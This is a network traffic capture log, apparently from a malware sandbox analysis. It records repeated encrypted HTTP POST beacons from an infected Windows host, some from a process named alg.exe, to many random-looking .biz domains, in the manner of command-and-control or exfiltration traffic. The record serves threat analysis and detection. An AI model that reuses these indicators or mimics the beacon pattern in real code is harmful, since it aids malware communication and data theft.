                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=90cd308dfe2e28bf885c8d7991a0835f|155.94.241.187|1731920308|1731920308|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      97192.168.2.75007618.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.908274889 CET343OUTPOST /pb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.908292055 CET842OUTData Raw: 41 80 8d fc 1f d2 12 39 3e 03 00 00 b9 7c 73 03 36 00 dc 24 e3 6b aa b3 07 0a 9b 8c 7c a6 7d 74 82 5b 22 17 0a 56 1b 33 c4 d9 0b 66 ad d6 3f 0f 15 00 44 16 29 82 ad 69 78 81 1f 6f e4 1d b8 ce 04 25 cd 3a e2 82 58 f4 8a 34 1e 9e e4 33 4f ea 67 ab
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: A9>|s6$k|}t["V3f?D)ixo%:X43Og_dNcgR:SyIOaPN~{}D<$A*IMxHLbB-Ht\X7;S{Q[g&n?Rz-WjA`+NbZtB}tBX^7'+6M~k3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.584336996 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=333b856d9b87704c4e7ef720ade29d59|155.94.241.187|1731920308|1731920308|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      98192.168.2.75007744.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.634391069 CET353OUTPOST /bbdsvdesg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.634407043 CET842OUTData Raw: 3c 9e 05 19 34 54 50 38 3e 03 00 00 ac 51 6b 54 d1 ca 46 46 57 b4 cb 45 db 7b 1e 6e e2 b0 bf aa 2d 94 ac 34 41 95 c4 5f 6c 50 be bf e2 92 72 e9 77 de 43 e0 c6 10 18 1b fa 4a 69 f2 bc e6 55 a0 f2 bd 9c 0d 26 03 2c 75 51 1a 5a c7 c7 10 b0 fc 4d ea
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <4TP8>QkTFFWE{n-4A_lPrwCJiU&,uQZM#E{#<BD3dlI)^fSkXnBmbz@uY(CyglRcnemc?UE,M)W~]Y)=B]CW
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.276596069 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=0d65647373a0b802e3f642407747c3bd|155.94.241.187|1731920309|1731920309|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      99192.168.2.75007818.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.053622007 CET359OUTPOST /fvijpyejxccmhfmi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.053622007 CET778OUTData Raw: 10 6d 7b cc 9b 5a 47 f3 fe 02 00 00 61 92 a4 3a c3 bb d8 7b 83 b3 26 1e ea d0 ea 8e a9 b3 f3 f3 0e 3c fe d2 c2 cb 33 d9 e5 1e 36 4a 4a 7f 19 39 b0 c8 98 3f 55 16 f4 ab 04 d4 4d 8a f0 b5 c8 68 cc 5d 11 1e 10 70 a0 7b 4e 80 66 00 f7 50 b4 92 34 82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: m{ZGa:{&<36JJ9?UMh]p{NfP4c6fI<qo4+g]!7;/j^>%K#@6%Lk0W+~~<'P@EQ"@@r&?_D<^]ppA[$ mJ>ptI\
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.516810894 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=76d3df5658b4bcadae454c9cc941aec1|155.94.241.187|1731920310|1731920310|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      100192.168.2.75007918.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.323323965 CET345OUTPOST /p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.323367119 CET842OUTData Raw: 00 f9 33 41 54 13 de 9a 3e 03 00 00 24 e3 8d 34 18 a0 e6 0d 9f 3c 85 07 c8 24 18 65 c2 e7 50 4f 7a 5b e1 5e ec 00 3b ff 7d 6f a8 57 01 5d 6d fd 76 fd 0d fb 4a a8 fc fa 54 d1 bf 86 0a 82 5c d9 f8 14 8e 71 ef b4 2c a6 13 98 85 76 18 e5 cc eb a0 b2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 3AT>$4<$ePOz[^;}oW]mvJT\q,vPIE,yk]'=LiD}gRNYmb52.=Gxbcx^kEJ6J}fYr+3q4-#^B$}}Apj#H#ipk<#@Xv
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.780033112 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3fd5b546435c74fbf75e2719f3d6bbf2|155.94.241.187|1731920310|1731920310|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      101192.168.2.75008018.246.231.12080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.808743954 CET344OUTPOST /tcj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.808768034 CET842OUTData Raw: 22 eb 14 3c 4a 42 e2 99 3e 03 00 00 d1 57 68 15 06 ed 8a f4 38 4d c5 f2 87 60 09 4e 62 fb 31 9d 11 d2 bb 7e fc 5f b4 3c 96 51 d9 ba 56 ce 15 d6 dd 8e 37 1d 30 fb 68 d9 e8 64 c2 84 e5 c1 1d c3 85 43 82 66 97 25 2a 9e e6 ce 13 2f 23 ca 53 97 1f 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: "<JB>Wh8M`Nb1~_<QV70hdCf%*/#SOP^9W\&'t2J*cD>! !Bo4AI#\fG@j+R&S8a\ZYNaidcv[qZ#7t=|
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.635421038 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=ec1f2aa391e58fccb8ed7cc497d61187|155.94.241.187|1731920311|1731920311|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      102192.168.2.75008113.251.16.150805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.817739010 CET345OUTPOST /qwnv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.817814112 CET778OUTData Raw: df 0e ef ef 33 0b 4c 1d fe 02 00 00 08 a8 ad 91 6b e7 d7 3c 6f c1 93 60 36 96 33 16 8f f5 24 cd 0c 97 b7 76 be 6a 96 44 1c 69 35 e4 0a c0 3c 10 68 cb a2 72 a7 7c 7f 68 b9 ef aa eb 7a 8c 7e cd 62 d2 8e 55 b8 c6 09 ff e9 e5 f5 48 7c 9f a2 66 a4 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 3Lk<o`63$vjDi5<hr|hz~bUH|fl>cpJG(Ghg~*kO,-<kO0R&R<`1U}!dll07mJP/FD/UK_t]!WnO}q
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.270976067 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=41cd003de10cb601983c02fd970246ef|155.94.241.187|1731920311|1731920311|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      103192.168.2.75008218.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.653544903 CET351OUTPOST /npkowol HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.653558969 CET842OUTData Raw: 17 dc c0 ee 85 47 9e 38 3e 03 00 00 a8 45 a2 b7 85 03 99 19 54 2b bf e1 24 ac a3 6d 16 fc a4 a6 c3 82 d7 02 83 db 5f e7 96 9a 88 be c8 30 11 cb 73 68 56 91 b1 d8 d5 21 9c 60 cb 69 31 07 e8 c6 33 fb 6e 41 00 4d 54 24 9d ef 96 20 6f f8 b7 cb 06 04
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: G8>ET+$m_0shV!`i13nAMT$ ouX7Jk$Ml .-gh-cnEYvt7~,W|C".r5#fCqBW#@mQ{nIvEq5.I+yIIYf
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.324853897 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=0509a1ea59a34fcc2c389c4a48f03373|155.94.241.187|1731920312|1731920312|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      104192.168.2.75008313.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.378391027 CET357OUTPOST /kjhhbldlylrmqyc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.378391027 CET842OUTData Raw: 43 c4 f3 01 f8 de 3a b2 3e 03 00 00 5c 1f fc ec f3 9d ae 4f 17 5a 7a dc c4 d8 15 1d e3 a0 42 3e 8e bb fa 78 08 b7 3b 55 13 09 7b 0d f8 d8 01 cc a7 fd 78 e1 e7 da 37 fc ee 80 54 66 b4 34 c7 de 81 22 85 0f f8 c6 24 05 7d 3e 77 ca 05 58 63 5d c7 73
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: C:>\OZzB>x;U{x7Tf4"$}>wXc]sR\f:B|m;`lx^.M*jn Qe?y|d>9+r)afp^Z m&8IE^Sfm7~(]ZxuY
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.829129934 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=9a562469eed0cef89bddbc788624c2de|155.94.241.187|1731920313|1731920313|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      105192.168.2.75008418.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.552318096 CET347OUTPOST /vv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.552318096 CET778OUTData Raw: 49 1e 26 28 c3 3b 6b c1 fe 02 00 00 be cd 6e e5 26 35 ca f9 4b ae 0e 08 b2 45 5e 89 ca 32 11 1b de 71 d8 f6 88 5c 3c ac 2e 5d bb f2 4d 69 d3 43 28 a0 24 f3 ca 62 37 5b 7a 0c 17 24 fa c6 f4 71 2b 5d cd 58 97 d5 8d 65 a3 dd 37 d5 30 ed 7e 30 02 70
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: I&(;kn&5KE^2q\<.]MiC($b7[z$q+]Xe70~0p@cy0gx?n^%P+=r$etz,l5N3)a9J}U>HgpUm0&^?"e%Y9|6`MU@}>
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.236655951 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=cd11d5efdb18f94d16c6bd0d0be98a4a|155.94.241.187|1731920313|1731920313|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      106192.168.2.75008518.246.231.120805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.642745972 CET349OUTPOST /wufabwul HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
